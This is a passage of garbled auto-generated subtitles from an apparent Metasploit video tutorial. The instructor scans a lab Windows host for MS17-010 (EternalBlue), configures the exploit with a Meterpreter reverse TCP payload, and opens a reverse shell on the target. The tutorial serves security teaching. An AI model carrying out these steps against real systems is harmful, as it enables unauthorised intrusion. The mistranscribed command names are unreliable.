our search results. 366 00:22:46,990 --> 00:22:49,990 So the first one is a auxillary module administrator. 367 00:22:49,990 --> 00:22:53,950 So it would be checking on the internal blue SMB windows. 368 00:22:53,950 --> 00:22:55,000 Come on execution. 369 00:22:55,270 --> 00:22:56,710 We got auxillary scanner. 370 00:22:56,710 --> 00:23:03,270 So scanner is actually a way for us to scan a system to see if it is vulnerable to a particular exploit. 371 00:23:03,550 --> 00:23:05,230 And of course, we've got a number of exploits here. 372 00:23:05,240 --> 00:23:06,910 We've got two, three, four and five. 373 00:23:07,180 --> 00:23:11,830 So we've got eternal blue, we got SMB MI 17 zero one zero. 374 00:23:12,040 --> 00:23:14,290 So again, we've got a blue internal blue eight. 375 00:23:14,290 --> 00:23:21,190 We got execute and of course that is on Eterno Blue Champion SMB Remote Windows Code execution. 376 00:23:21,190 --> 00:23:30,190 We've got Semba double pulser RSI so we can actually enter, use auxillary scanner SMB, SMB on a score 377 00:23:30,190 --> 00:23:33,370 at seventeen, hit enter indebt, enter show options. 378 00:23:34,660 --> 00:23:39,940 So over here again, if you see Caerphilly back into the sleights, we actually have a show options 379 00:23:39,940 --> 00:23:40,570 capability. 380 00:23:40,570 --> 00:23:45,710 So that is the part where we want to find out more information or details about the particular exploit. 381 00:23:45,910 --> 00:23:50,260 So again, we are able to find all those information directly from here by entering show options. 382 00:23:50,740 --> 00:23:53,830 So if you see over here, we can see all the show options available to you on that. 383 00:23:54,340 --> 00:23:55,750 So we can enter a set. 384 00:23:56,500 --> 00:23:58,890 Of course, here we can see the parameter that we have a key in. 385 00:23:58,900 --> 00:23:59,650 So required. 386 00:23:59,650 --> 00:24:00,260 No required. 387 00:24:00,310 --> 00:24:02,140 No, no, that's a yes. 388 00:24:02,140 --> 00:24:02,670 A nameplate. 389 00:24:02,680 --> 00:24:07,060 So we have already supplied those information over there and we have another one of our hosts so we 390 00:24:07,060 --> 00:24:13,300 can actually set our house and we can actually specify the IP address of the target machine. 391 00:24:13,660 --> 00:24:15,950 So one or two one six eight one eight nine. 392 00:24:16,090 --> 00:24:21,940 So go ahead, enter that one two one six eight one eight nine hit enter and that we can actually see 393 00:24:22,240 --> 00:24:25,270 the armholes information, of course, moving forward. 394 00:24:25,300 --> 00:24:27,680 We see that the rest of the information has been filled in. 395 00:24:28,120 --> 00:24:30,090 So once you're done on that, go ahead, hit front. 396 00:24:30,640 --> 00:24:34,120 So again, here we are checking whether the system invulnerable. 397 00:24:34,300 --> 00:24:40,770 So he says host is slightly vulnerable to me, 17 zero one zero Windows 10 zero one four three nine 398 00:24:41,030 --> 00:24:41,500 sixty four. 399 00:24:42,370 --> 00:24:47,380 So once we have check on the system, we can do a search once again to actually find out about what 400 00:24:47,380 --> 00:24:48,350 explodes we can use. 401 00:24:48,370 --> 00:24:55,750 So in this case, we can select number four so we can enter, use, exploit windows SMB Mouse 17 zero 402 00:24:55,750 --> 00:24:56,320 one zero. 403 00:24:57,910 --> 00:25:09,160 So use exploit windows SMB Mouse 17 zero one zero c p c heat enter and debt and to show options. 404 00:25:09,520 --> 00:25:15,010 So again, here we will see what are the parameters where it is compulsory for us to actually look into. 405 00:25:15,520 --> 00:25:20,290 So here we got the DB trace, which has already been Felic attempts already been filled. 406 00:25:20,560 --> 00:25:22,270 So we get a feeling into our hosts. 407 00:25:22,720 --> 00:25:28,240 So our host is the target IP address, as mentioned earlier, said our hosts one or two one six eight 408 00:25:28,390 --> 00:25:29,480 one eight nine. 409 00:25:29,500 --> 00:25:31,780 So in my case it is eight nine again. 410 00:25:31,780 --> 00:25:34,210 In your case it could be a different IP address. 411 00:25:34,420 --> 00:25:40,300 So we can go ahead and hit enter on debt and now we can enter show Paillot, what are the palettes available 412 00:25:40,300 --> 00:25:41,720 to get with this exploit? 413 00:25:42,070 --> 00:25:44,460 So again, it's retrieving the information from the database. 414 00:25:44,470 --> 00:25:49,330 So here we can see we've got two zero eight number of exploit, a number of Palouse that we can use. 415 00:25:50,050 --> 00:25:51,500 So here we can see Windows eight. 416 00:25:51,520 --> 00:25:54,160 Sixty four, we can see reverse Meenakshi DP. 417 00:25:54,400 --> 00:25:58,120 So the one is going to be the most suitable for today's tutorial. 418 00:25:58,300 --> 00:26:03,400 We're actually on me to Preeta, so let's screw up a little more and see that we can see all the windows. 419 00:26:03,520 --> 00:26:09,610 Sixty four metre preeta shell that we can get so in case we are going to be more interested in this 420 00:26:09,610 --> 00:26:09,810 one. 421 00:26:09,820 --> 00:26:11,980 So this is a Windows XP for me. 422 00:26:11,980 --> 00:26:14,210 To Preeta Reverse underscore the DP. 423 00:26:14,260 --> 00:26:15,610 So copy the selection. 424 00:26:16,240 --> 00:26:21,850 I'll scroll all the way down, I'll add to set payload and I'll pace the selection from the clipboard 425 00:26:22,300 --> 00:26:25,840 so I can pay selection hit enter on that enter show options. 426 00:26:26,200 --> 00:26:31,710 So now because we have a payload that would give us a shell reverse shell, we have to set the elbows 427 00:26:31,720 --> 00:26:33,440 or the local listener hostname. 428 00:26:34,000 --> 00:26:40,080 So what I'm going to do is I'm going to enter IP ADR the final the IP address of your colonics machine. 429 00:26:40,090 --> 00:26:44,550 So in this case I'll call the next machine is one or two one six eight one nine one. 430 00:26:45,010 --> 00:26:46,480 So go ahead and enter set. 431 00:26:47,440 --> 00:26:55,120 One, two one six eight one nine one and talk show options again to check all the options, all the 432 00:26:55,120 --> 00:26:57,940 values, and make sure that you have a key parameter on that. 433 00:26:58,630 --> 00:27:00,010 So here we go, Ellos. 434 00:27:00,010 --> 00:27:06,120 We got the airport number as well, and we got all the parameters set forward in as well in our house. 435 00:27:06,490 --> 00:27:10,170 So once you have all this information in place, go ahead, enter exploit. 436 00:27:10,270 --> 00:27:14,370 And that would give us our shall allow me to put a shell into the target machine. 437 00:27:14,800 --> 00:27:17,440 So once you're in the shell meter, pretty shake and enter help. 438 00:27:17,680 --> 00:27:23,200 So once again, in help, we can see all the modules available for us and we can actually see a lot 439 00:27:23,200 --> 00:27:27,010 of information, a lot of capabilities, a lot of things that we can enter into. 440 00:27:27,490 --> 00:27:33,790 So one example is we can actually enter the different kind of modules that we can use at our car, commands 441 00:27:33,790 --> 00:27:34,490 that we can use. 442 00:27:34,810 --> 00:27:40,350 So the question mark also is a way to put up the help manual and we can background a current session. 443 00:27:40,360 --> 00:27:44,490 We can kill processes that are inside a system, we can migrate and so on. 444 00:27:44,500 --> 00:27:50,950 So some of the commonly used ones will be on the system information system infl so we can go ahead and 445 00:27:50,950 --> 00:27:53,650 screw all the way down and antiracist infl. 446 00:27:54,070 --> 00:27:58,030 So it's very important that you try out all these different commands because it will be very helpful 447 00:27:58,030 --> 00:28:03,980 for you to get yourself familiar with Matus framework so you understand everything about Matus framework. 448 00:28:04,630 --> 00:28:08,440 So once again, I hope you learned something valuable in today's lecture and tutorial. 449 00:28:08,710 --> 00:28:13,300 And if you like what you watch remotely like, subscribe to the channel so that you can be kept abreast 450 00:28:13,390 --> 00:28:14,830 of the latest episode of Tutorial. 451 00:28:15,130 --> 00:28:19,300 And if have any questions, feel free to leave a comment below and I'll try my best to answer any of 452 00:28:19,300 --> 00:28:19,900 your queries. 453 00:28:20,590 --> 00:28:22,120 Thank you so much once again for watching. 49931